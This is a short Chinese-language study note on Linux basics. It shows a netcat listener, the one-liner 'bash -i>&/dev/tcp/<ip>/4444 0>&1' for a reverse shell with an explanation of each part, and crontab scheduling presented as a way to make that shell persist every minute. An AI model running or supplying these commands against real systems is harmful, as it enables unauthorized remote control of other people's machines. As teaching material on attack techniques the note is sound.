Linux-基础知识

linux基础知识

linux反弹shell命令

监听服务端

使用netcat进行监听端口

nc -lvp +端口号(可任意设置未使用位置)

反弹客户端

bash -i>&/dev/tcp/服务端ip地址/4444 0>&1

-i  用户输入命令进行执行

>&    将bash -i 交互执行结构 重定向(>)并不做结果输出(&)

/dev/tcp/服务端ip地址/4444 基于TCP连接到 ip和端口位置

0>>&1    将获得输入重定向保存到输出中，这样监听端可获取输入与输出都显示的效果

执行完毕后不会进行任何输出，此时监听服务端得到反弹的shell连接。

此时获得反弹服务端的shell，可执行任意命令。但是一旦客户端关闭shell窗口，此时连接中断。为了可持久反弹，可用定时任务。

linux定时任务

用于设置Linux进行周期性执行某种任务等某些事件的操作。类似windows下
的计划任务。

在linux下可通过crontab进行计划任务的编写与浏览

1、查看当前用户的定时任务

crontab -l

2、编辑任务

crontab -e

*/1 * * * *+任务每分钟执行

也可以在/var/spool/cron目录下 新建用户自定义的文件(以用户名命名)，编写计划任务。

对于该命令是否执行，可通过/var/log/cron.log查看日志是否执行任务。

如果没有日志记录，可编辑/etc/rsyslog.conf，将cron前的注释去掉，同时使用命令重启服务

service rsyslog restart